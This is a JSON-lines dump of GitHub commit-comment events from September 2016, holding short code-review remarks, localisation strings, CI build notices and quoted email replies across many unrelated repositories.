{"id":"4603683987","type":"CommitCommentEvent","actor":{"login":"Beloya"},"repo":{"name":"Coande/LandLeg_Java"},"payload":{"comment":{"id":19133291,"position":null,"line":null,"path":null,"commit_id":"a34b9c596d91fadffeee79c22a64c9f01d353183","created_at":"2016-09-22T16:46:27Z","updated_at":"2016-09-22T16:46:27Z","body":"最新的是天翼2.2的算法，不更新吗？"}},"created_at":"2016-09-22T16:46:27Z"}
{"id":"4603685414","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19133293,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T16:46:40Z","updated_at":"2016-09-22T16:46:40Z","body":"we are trying to reduce the number of steps required to put out a new build and updating an extra repo just to bump the version seems really unnecessary"}},"created_at":"2016-09-22T16:46:40Z"}
{"id":"4603686324","type":"CommitCommentEvent","actor":{"login":"sylvain86"},"repo":{"name":"yenlysone/AitNewWebRepo"},"payload":{"comment":{"id":19133297,"position":null,"line":null,"path":null,"commit_id":"33ee482201e6e0f9136cf8215ac26cf4a5630f93","created_at":"2016-09-22T16:46:49Z","updated_at":"2016-09-22T16:46:49Z","body":"I saw your commit Landry, but I do not think it has been pushed to master"}},"created_at":"2016-09-22T16:46:49Z"}
{"id":"4603687831","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19133300,"position":36,"line":31,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T16:47:05Z","updated_at":"2016-09-22T16:47:05Z","body":"Fai il giro di prova delle ultime funzioni sperimentali e lascia la tua impronta sul futuro di Firefox."}},"created_at":"2016-09-22T16:47:05Z"}
{"id":"4603694229","type":"CommitCommentEvent","actor":{"login":"Nirgalz"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":19133315,"position":null,"line":null,"path":null,"commit_id":"90ea926af2a3518aee597b2d7aae276e80e4a966","created_at":"2016-09-22T16:48:15Z","updated_at":"2016-09-22T16:48:15Z","body":"C'était pour garder le code DRY vu que ce module est le même pour opérations et formations, pas pensé aux droits :)"}},"created_at":"2016-09-22T16:48:15Z"}
{"id":"4603696415","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19133319,"position":61,"line":51,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T16:48:40Z","updated_at":"2016-09-22T16:48:40Z","body":"Decidi insieme a noi quali funzioni includere nelle prossima versione di Firefox per Android."}},"created_at":"2016-09-22T16:48:40Z"}
{"id":"4603697284","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133321,"position":18,"line":18,"path":"chainpoint.py","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T16:48:50Z","updated_at":"2016-09-22T16:48:50Z","body":"start the file with\r\n```python\r\nfrom __future__ import unicode_literals\r\n```\r\nand forget about prefixing strings with `u`."}},"created_at":"2016-09-22T16:48:50Z"}
{"id":"4603700364","type":"CommitCommentEvent","actor":{"login":"joaocarvalhowd"},"repo":{"name":"davidalves1/dojo-promises"},"payload":{"comment":{"id":19133332,"position":null,"line":null,"path":null,"commit_id":"4cebc5fbce89cb345f85cb354844b80cc08e0db3","created_at":"2016-09-22T16:49:26Z","updated_at":"2016-09-22T16:49:26Z","body":"Yeah! :smile: "}},"created_at":"2016-09-22T16:49:26Z"}
{"id":"4603700610","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19133335,"position":null,"line":null,"path":null,"commit_id":"4eb006c559041652e8799c9224ec0bdf9f60decb","created_at":"2016-09-22T16:49:28Z","updated_at":"2016-09-22T16:49:28Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 255](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1216&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:26:20"}},"created_at":"2016-09-22T16:49:28Z"}
{"id":"4603701092","type":"CommitCommentEvent","actor":{"login":"lembacon"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19133339,"position":null,"line":null,"path":null,"commit_id":"21e1537c91c34a445122357830b0802ca23d6dc0","created_at":"2016-09-22T16:49:34Z","updated_at":"2016-09-22T16:49:34Z","body":"@DomT4 `openssl.cnf` is missing from the Sierra bottle. If I install `openssl` with `--build-from-source`, the `openssl.cnf` is there."}},"created_at":"2016-09-22T16:49:34Z"}
{"id":"4603703548","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19133351,"position":null,"line":null,"path":null,"commit_id":"c7c5eb2dc9e3fe22c22ce713709135784b689a0a","created_at":"2016-09-22T16:50:00Z","updated_at":"2016-09-22T16:50:00Z","body":"References to issue #85 "}},"created_at":"2016-09-22T16:50:00Z"}
{"id":"4603704536","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133354,"position":22,"line":22,"path":"chainpoint.py","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T16:50:12Z","updated_at":"2016-09-22T16:50:12Z","body":"`type` is a ... type! you are shadowing the builtin. Don't."}},"created_at":"2016-09-22T16:50:12Z"}
{"id":"4603705352","type":"CommitCommentEvent","actor":{"login":"davisein"},"repo":{"name":"EfrenRey/clc-python-sdk"},"payload":{"comment":{"id":19133356,"position":null,"line":null,"path":null,"commit_id":"9ebbbf20ac08c8c748217fbe5b357c4d7e47201b","created_at":"2016-09-22T16:50:21Z","updated_at":"2016-09-22T16:50:21Z","body":"ACK"}},"created_at":"2016-09-22T16:50:21Z"}
{"id":"4603709449","type":"CommitCommentEvent","actor":{"login":"yenlysone"},"repo":{"name":"yenlysone/AitNewWebRepo"},"payload":{"comment":{"id":19133360,"position":null,"line":null,"path":null,"commit_id":"33ee482201e6e0f9136cf8215ac26cf4a5630f93","created_at":"2016-09-22T16:51:08Z","updated_at":"2016-09-22T16:51:08Z","body":"I will investigate we should be able to make proper changes.\n\nSent from a mobile device.  Please excuse any typo or error.\n\nOn Sep 22, 2016 11:46 AM, \"Sylvain Edoukou\" <notifications@github.com>\nwrote:\n\n> I saw your commit Landry, but I do not think it has been pushed to master\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yenlysone/AitNewWebRepo/commit/33ee482201e6e0f9136cf8215ac26cf4a5630f93#commitcomment-19133297>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKY2YDpyEh_Jh78gDv8rhAw5Wsm3qDKXks5qsrD5gaJpZM4KEHmQ>\n> .\n>\n"}},"created_at":"2016-09-22T16:51:08Z"}
{"id":"4603710633","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19133362,"position":76,"line":63,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T16:51:21Z","updated_at":"2016-09-22T16:51:21Z","body":"<a rel=\"external\" href=\"%(feedback)s\">I tuoi commenti</a> ci aiutano a dare gli ultimi ritocchi per perfezionare le prestazioni e funzioni di Firefox in un ambiente stabile."}},"created_at":"2016-09-22T16:51:21Z"}
{"id":"4603712948","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19133369,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T16:51:47Z","updated_at":"2016-09-22T16:51:47Z","body":"> don't have any opinion on this too\r\n\r\nThen let's leave it as it is now. We tested all the time with really heavy loads so the 1008 MHz should be fine. "}},"created_at":"2016-09-22T16:51:47Z"}
{"id":"4603713832","type":"CommitCommentEvent","actor":{"login":"drgrib"},"repo":{"name":"IBMStreams/streamsx.topology"},"payload":{"comment":{"id":19133371,"position":null,"line":null,"path":null,"commit_id":"9b4b1c9ae3532ded35d279c992ab31fb4a782e41","created_at":"2016-09-22T16:51:57Z","updated_at":"2016-09-22T16:51:57Z","body":"👍"}},"created_at":"2016-09-22T16:51:57Z"}
{"id":"4603715578","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"xdevs23/android_frameworks_base-xos7-aosp"},"payload":{"comment":{"id":19133374,"position":null,"line":null,"path":null,"commit_id":"859456c9ac92372942ecf768908efc795f682393","created_at":"2016-09-22T16:52:16Z","updated_at":"2016-09-22T16:52:16Z","body":"meh"}},"created_at":"2016-09-22T16:52:16Z"}
{"id":"4603718405","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19133380,"position":null,"line":null,"path":null,"commit_id":"21e1537c91c34a445122357830b0802ca23d6dc0","created_at":"2016-09-22T16:52:46Z","updated_at":"2016-09-22T16:52:46Z","body":"It's missing from all the bottles. Not sure what happened there 😕. Will take a peek shortly."}},"created_at":"2016-09-22T16:52:46Z"}
{"id":"4603718470","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133381,"position":23,"line":485,"path":"kern/arch/x86/x86.h","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T16:52:47Z","updated_at":"2016-09-22T16:52:47Z","body":"ok"}},"created_at":"2016-09-22T16:52:47Z"}
{"id":"4603720038","type":"CommitCommentEvent","actor":{"login":"nebukazar"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19133383,"position":8,"line":26,"path":"src/css/Catalog.css","commit_id":"1451db0c2f75902213648d472963f9a817c82576","created_at":"2016-09-22T16:53:04Z","updated_at":"2016-09-22T16:53:04Z","body":"https://github.com/nebukazar/OneeChan/commit/9f6ebc151dc5797068ac17f51ffb2e67741569fa"}},"created_at":"2016-09-22T16:53:04Z"}
{"id":"4603720444","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19133384,"position":null,"line":null,"path":null,"commit_id":"9df3d60efa063adf509705ab5246fed94d37b780","created_at":"2016-09-22T16:53:09Z","updated_at":"2016-09-22T16:53:09Z","body":"@pb00068 Oh, I think I see what you mean. If any king position changes, then the discovered check candidates become invalid for the other side ?\r\n"}},"created_at":"2016-09-22T16:53:09Z"}
{"id":"4603720566","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133385,"position":25,"line":487,"path":"kern/arch/x86/x86.h","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T16:53:10Z","updated_at":"2016-09-22T16:53:10Z","body":"They weren't in use, but I brought them back in later."}},"created_at":"2016-09-22T16:53:10Z"}
{"id":"4603721223","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/sparklyr"},"payload":{"comment":{"id":19133389,"position":15,"line":47,"path":"README.md","commit_id":"49198b2aea99f6a7bc76fd9faafeb91079d66227","created_at":"2016-09-22T16:53:17Z","updated_at":"2016-09-22T16:53:17Z","body":"Yes, for sure..."}},"created_at":"2016-09-22T16:53:17Z"}
{"id":"4603724131","type":"CommitCommentEvent","actor":{"login":"vgpprasad91"},"repo":{"name":"vgpprasad91/Natural-Language-Processing-NLP"},"payload":{"comment":{"id":19133397,"position":null,"line":null,"path":null,"commit_id":"121ef24cec9eddba6614995371fea0e5815cc7c9","created_at":"2016-09-22T16:53:49Z","updated_at":"2016-09-22T16:53:49Z","body":"POS Tagger using NLTK"}},"created_at":"2016-09-22T16:53:49Z"}
{"id":"4603724174","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133398,"position":null,"line":null,"path":null,"commit_id":"ef1226b4cead0a07b72c225954954cf68255c32b","created_at":"2016-09-22T16:53:50Z","updated_at":"2016-09-22T16:53:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1131](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14008&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:18"}},"created_at":"2016-09-22T16:53:50Z"}
{"id":"4603729675","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19133412,"position":106,"line":87,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T16:54:52Z","updated_at":"2016-09-22T16:54:52Z","body":"Con Nightly puoi provare ogni giorno (… o notte) le ultimissime funzioni di Firefox. Utilizza a tuo rischio e pericolo."}},"created_at":"2016-09-22T16:54:52Z"}
{"id":"4603732119","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133421,"position":48,"line":241,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T16:55:19Z","updated_at":"2016-09-22T16:55:19Z","body":"Yeah, I realized that later."}},"created_at":"2016-09-22T16:55:19Z"}
{"id":"4603732784","type":"CommitCommentEvent","actor":{"login":"MichaelXavier"},"repo":{"name":"bermanjosh/bloodhound"},"payload":{"comment":{"id":19133422,"position":null,"line":null,"path":null,"commit_id":"7ffb3d2fdef1307b0b9c5731909edac89a9bdc67","created_at":"2016-09-22T16:55:26Z","updated_at":"2016-09-22T16:55:26Z","body":"Yeah, `.:?` is perfect for the case where its just missing. I would advocate that we should use Maybe rather than adding a specialized Null. A NA version seems semantically equivalent to it not being there, unless NA actually doesn't mean not available, which I wouldn't put past elastic. We're really just papering over elasticsearch's inconsistent API and trying to present something sensible to the end user."}},"created_at":"2016-09-22T16:55:26Z"}
{"id":"4603733086","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19133424,"position":5,"line":13,"path":"it/firefox/features.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T16:55:29Z","updated_at":"2016-09-22T16:55:29Z","body":"passi > trascorri"}},"created_at":"2016-09-22T16:55:29Z"}
{"id":"4603735385","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19133429,"position":11,"line":546,"path":"components/MapView.js","commit_id":"1a3c8197093ed39730514460c60a60788189ac6c","created_at":"2016-09-22T16:55:53Z","updated_at":"2016-09-22T16:55:53Z","body":"oh yes, of course! 😵 "}},"created_at":"2016-09-22T16:55:53Z"}
{"id":"4603736037","type":"CommitCommentEvent","actor":{"login":"xabre"},"repo":{"name":"xabre/xamarin-bluetooth-le"},"payload":{"comment":{"id":19133432,"position":null,"line":null,"path":null,"commit_id":"9ac8dc1b6f9c913ed17e29974e9c1c015c5f7cd3","created_at":"2016-09-22T16:56:01Z","updated_at":"2016-09-22T16:56:01Z","body":":)) haven't seen that get called once, can't find any good documentation either\r\n"}},"created_at":"2016-09-22T16:56:01Z"}
{"id":"4603738100","type":"CommitCommentEvent","actor":{"login":"gryphonmyers"},"repo":{"name":"COCOPi/cockpit"},"payload":{"comment":{"id":19133435,"position":null,"line":null,"path":null,"commit_id":"bc44371ee788cb35aeddccfbd5d16eb650024a09","created_at":"2016-09-22T16:56:24Z","updated_at":"2016-09-22T16:56:24Z","body":"Nice!"}},"created_at":"2016-09-22T16:56:24Z"}
{"id":"4603738717","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133436,"position":428,"line":428,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:56:31Z","updated_at":"2016-09-22T16:56:31Z","body":"s/options/option/"}},"created_at":"2016-09-22T16:56:31Z"}
{"id":"4603741782","type":"CommitCommentEvent","actor":{"login":"robnagler"},"repo":{"name":"radiasoft/sirepo"},"payload":{"comment":{"id":19133445,"position":null,"line":null,"path":null,"commit_id":"e9216db90227cb81de093fb3612ee86aec2f2f7c","created_at":"2016-09-22T16:57:07Z","updated_at":"2016-09-22T16:57:07Z","body":"Is there a bug in _.isFunction()?"}},"created_at":"2016-09-22T16:57:07Z"}
{"id":"4603743156","type":"CommitCommentEvent","actor":{"login":"bermanjosh"},"repo":{"name":"bermanjosh/bloodhound"},"payload":{"comment":{"id":19133452,"position":null,"line":null,"path":null,"commit_id":"7ffb3d2fdef1307b0b9c5731909edac89a9bdc67","created_at":"2016-09-22T16:57:23Z","updated_at":"2016-09-22T16:57:23Z","body":"Ok, so I'll do the `Maybe` `newtype` for VersionNumber, and change `load` to `.:?`."}},"created_at":"2016-09-22T16:57:23Z"}
{"id":"4603744015","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133454,"position":134,"line":422,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T16:57:33Z","updated_at":"2016-09-22T16:57:33Z","body":"I was wondering why it's called a hack.  If that constant was named or had explanation it doesn't really seem like a hack."}},"created_at":"2016-09-22T16:57:33Z"}
{"id":"4603746566","type":"CommitCommentEvent","actor":{"login":"tudorbeleuta"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":19133463,"position":null,"line":null,"path":null,"commit_id":"1da177e4c3f41524e886b7f1b8a0c1fc7321cac2","created_at":"2016-09-22T16:57:57Z","updated_at":"2016-09-22T16:57:57Z","body":"Binary search applied irl YEAAAH"}},"created_at":"2016-09-22T16:57:57Z"}
{"id":"4603747022","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133467,"position":153,"line":449,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T16:58:06Z","updated_at":"2016-09-22T16:58:06Z","body":"Yup :)"}},"created_at":"2016-09-22T16:58:06Z"}
{"id":"4603752741","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133477,"position":41,"line":41,"path":"chainpoint.py","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T16:59:09Z","updated_at":"2016-09-22T16:59:09Z","body":"superfluous `else` clause "}},"created_at":"2016-09-22T16:59:09Z"}
{"id":"4603753220","type":"CommitCommentEvent","actor":{"login":"mehvishiqbal"},"repo":{"name":"mehvishiqbal/task1"},"payload":{"comment":{"id":19133478,"position":null,"line":null,"path":null,"commit_id":"7c5926752b163884df17b68a9870783d2948dd57","created_at":"2016-09-22T16:59:14Z","updated_at":"2016-09-22T16:59:14Z","body":"deleteing"}},"created_at":"2016-09-22T16:59:14Z"}
{"id":"4603754982","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19133482,"position":203,"line":197,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"9e41ab435d00d75957706052aaa011a6a0bcfed8","created_at":"2016-09-22T16:59:34Z","updated_at":"2016-09-22T16:59:34Z","body":"Dlaczego ustawianie pól związanych z pojazdem sprzedawcy zostało zastąpione metodą, która korzysta wyłącznie z pól nabywcy? (setVehicles())"}},"created_at":"2016-09-22T16:59:34Z"}
{"id":"4603755719","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133485,"position":411,"line":411,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:59:43Z","updated_at":"2016-09-22T16:59:43Z","body":"Perhaps I misunderstood the instruction earlier but I think this should be \r\n```\r\n/*\r\n * Normally `copyProperty` would be an inline arrow function.\r\n * It is a standalone function here for illustrative purposes.\r\n */\r\n```"}},"created_at":"2016-09-22T16:59:43Z"}
{"id":"4603756971","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19133488,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-22T16:59:58Z","updated_at":"2016-09-22T16:59:58Z","body":"https://github.com/NREL/EnergyPlus/issues/5874"}},"created_at":"2016-09-22T16:59:58Z"}
{"id":"4603758456","type":"CommitCommentEvent","actor":{"login":"moellep"},"repo":{"name":"radiasoft/sirepo"},"payload":{"comment":{"id":19133491,"position":null,"line":null,"path":null,"commit_id":"e9216db90227cb81de093fb3612ee86aec2f2f7c","created_at":"2016-09-22T17:00:14Z","updated_at":"2016-09-22T17:00:14Z","body":"No, but if jquery has the same function, we should use jquery - that is the\nlibrary angularjs depends on anyway.\n\n\nOn Thu, Sep 22, 2016 at 10:57 AM, Rob Nagler <notifications@github.com>\nwrote:\n\n> Is there a bug in _.isFunction()?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/radiasoft/sirepo/commit/e9216db90227cb81de093fb3612ee86aec2f2f7c#commitcomment-19133445>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGNwrnmVz2ky8MTeFqf3gfoCPkKaPFjrks5qsrNjgaJpZM4KEIMV>\n> .\n>\n"}},"created_at":"2016-09-22T17:00:14Z"}
{"id":"4603760524","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133493,"position":444,"line":444,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:00:35Z","updated_at":"2016-09-22T17:00:35Z","body":"2 single line comments in a row."}},"created_at":"2016-09-22T17:00:35Z"}
{"id":"4603761305","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133499,"position":163,"line":458,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T17:00:45Z","updated_at":"2016-09-22T17:00:45Z","body":"Yeah, statements like this got a lot longer with the new commands but that better reflects the get and store process.  I was asking why it didn't exist because sctl wasn't a part of the port struct, but then I found it was defined as an actual member of the struct elsewhere."}},"created_at":"2016-09-22T17:00:45Z"}
{"id":"4603763296","type":"CommitCommentEvent","actor":{"login":"jobovy"},"repo":{"name":"andres-jordan/gaia_tools"},"payload":{"comment":{"id":19133505,"position":null,"line":null,"path":null,"commit_id":"daff04a2070cd50b76b9e1f51464fa6bc37a51ad","created_at":"2016-09-22T17:01:07Z","updated_at":"2016-09-22T17:01:07Z","body":"Hi,\r\n\r\nI updated the original ``gaia_tools`` package such that it simply downloads the APOGEE and APOGEE-RC data like the other catalogs if the ``jobovy/apogee`` is not installed. Don't want you or your students to not be using the APOGEE data! Please let me know if there is anything else I can do to make it easier to install.\r\n\r\nJo"}},"created_at":"2016-09-22T17:01:07Z"}
{"id":"4603765633","type":"CommitCommentEvent","actor":{"login":"samybob1"},"repo":{"name":"samybob1/meteor-electron"},"payload":{"comment":{"id":19133509,"position":5,"line":68,"path":"server/launchApp.js","commit_id":"1a2c513be6d6157e3efce74235aca6745657e96c","created_at":"2016-09-22T17:01:33Z","updated_at":"2016-09-22T17:01:33Z","body":"I don't know why [electron-builder](https://github.com/electron-userland/electron-builder/) is using the \"productName\" as the name of the executable file, while the .rpm and .deb files are named using the \"name\" field from the Meteor settings JSON file."}},"created_at":"2016-09-22T17:01:33Z"}
{"id":"4603765813","type":"CommitCommentEvent","actor":{"login":"alwey"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":19133510,"position":null,"line":null,"path":null,"commit_id":"9089373ff9cae4326a350383ebd448e58cec8ff1","created_at":"2016-09-22T17:01:35Z","updated_at":"2016-09-22T17:01:35Z","body":"Great, thank you!  :-)"}},"created_at":"2016-09-22T17:01:35Z"}
{"id":"4603770317","type":"CommitCommentEvent","actor":{"login":"WSawicka"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19133541,"position":203,"line":197,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"9e41ab435d00d75957706052aaa011a6a0bcfed8","created_at":"2016-09-22T17:02:26Z","updated_at":"2016-09-22T17:02:26Z","body":"Racja. Dziękuję za uwagę"}},"created_at":"2016-09-22T17:02:26Z"}
{"id":"4603770578","type":"CommitCommentEvent","actor":{"login":"Attix22"},"repo":{"name":"Vierheller/Organizer"},"payload":{"comment":{"id":19133542,"position":null,"line":null,"path":null,"commit_id":"b6741e9b1c33eb9eb9f40c7f99a91762f97f1b91","created_at":"2016-09-22T17:02:29Z","updated_at":"2016-09-22T17:02:29Z","body":"Die Farbe ist kacke"}},"created_at":"2016-09-22T17:02:29Z"}
{"id":"4603771234","type":"CommitCommentEvent","actor":{"login":"Andrey1960"},"repo":{"name":"Andrey1960/gittest"},"payload":{"comment":{"id":19133545,"position":null,"line":null,"path":null,"commit_id":"20aad2946359f8281c16277baf622281c4d10ff0","created_at":"2016-09-22T17:02:35Z","updated_at":"2016-09-22T17:02:35Z","body":"Hello from GitHub.com!!!"}},"created_at":"2016-09-22T17:02:35Z"}
{"id":"4603773899","type":"CommitCommentEvent","actor":{"login":"smstuebe"},"repo":{"name":"xabre/xamarin-bluetooth-le"},"payload":{"comment":{"id":19133550,"position":null,"line":null,"path":null,"commit_id":"9ac8dc1b6f9c913ed17e29974e9c1c015c5f7cd3","created_at":"2016-09-22T17:03:06Z","updated_at":"2016-09-22T17:03:06Z","body":"I sometimes have empty device names here. If I have time, I'll investigate it."}},"created_at":"2016-09-22T17:03:06Z"}
{"id":"4603776557","type":"CommitCommentEvent","actor":{"login":"komhsgr"},"repo":{"name":"free-greek-iptv/greek-iptv"},"payload":{"comment":{"id":19133556,"position":null,"line":null,"path":null,"commit_id":"bc3aa792b6529c7ff880c5008a881cb2aa75245c","created_at":"2016-09-22T17:03:36Z","updated_at":"2016-09-22T17:03:36Z","body":"#EXTINF:0, group-title=\"ΠΕΡΙΦΕΡΕΙΑΚΑ\" tvg-logo=\"http://i.imgur.com/aZJPj9f.png\",EXTRA CHANNEL BUP\r\nhttp://5.196.81.121:8000/live/baba/baba/1382.m3u8"}},"created_at":"2016-09-22T17:03:36Z"}
{"id":"4603776870","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19133557,"position":26,"line":22,"path":"src/main/java/asupinski/excel/ExcelWriter.java","commit_id":"8739dc7b7701ff30aac17ec4d0c02607f73ca2b8","created_at":"2016-09-22T17:03:40Z","updated_at":"2016-09-22T17:03:40Z","body":"Proszę o zmianę typu pola z HSSFWorkbook na Workbook, oraz odpowiedno zmianę nazwy pola."}},"created_at":"2016-09-22T17:03:40Z"}
{"id":"4603779449","type":"CommitCommentEvent","actor":{"login":"Babygogogo"},"repo":{"name":"Babygogogo/BabyWarsServer"},"payload":{"comment":{"id":19133566,"position":null,"line":null,"path":null,"commit_id":"9dbd594590f052769468db353b76b481260e8616","created_at":"2016-09-22T17:04:09Z","updated_at":"2016-09-22T17:04:09Z","body":"I hope that this commit fixes #69."}},"created_at":"2016-09-22T17:04:09Z"}
{"id":"4603780577","type":"CommitCommentEvent","actor":{"login":"NORKOLIS1988"},"repo":{"name":"NORKOLIS1988/SCROLL-VIEW"},"payload":{"comment":{"id":19133569,"position":null,"line":null,"path":null,"commit_id":"545ae191ffb71c2b1ead16990f1ba4f401846d0a","created_at":"2016-09-22T17:04:22Z","updated_at":"2016-09-22T17:04:22Z","body":"Help me"}},"created_at":"2016-09-22T17:04:22Z"}
{"id":"4603781196","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"aspnet/Diagnostics"},"payload":{"comment":{"id":19133573,"position":4,"line":46,"path":"src/Microsoft.AspNetCore.Diagnostics.Elm/project.json","commit_id":"1b1bd34b8d1e42f74a2a438b2ed87af28b5dd016","created_at":"2016-09-22T17:04:29Z","updated_at":"2016-09-22T17:04:29Z","body":"How did this fix anything?"}},"created_at":"2016-09-22T17:04:29Z"}
{"id":"4603784234","type":"CommitCommentEvent","actor":{"login":"Babygogogo"},"repo":{"name":"Babygogogo/BabyWars"},"payload":{"comment":{"id":19133577,"position":null,"line":null,"path":null,"commit_id":"dd5bcf0b5074bdb865bed355ec65d741482b2ce3","created_at":"2016-09-22T17:05:05Z","updated_at":"2016-09-22T17:05:05Z","body":"I hope that this commit fixes #69."}},"created_at":"2016-09-22T17:05:05Z"}
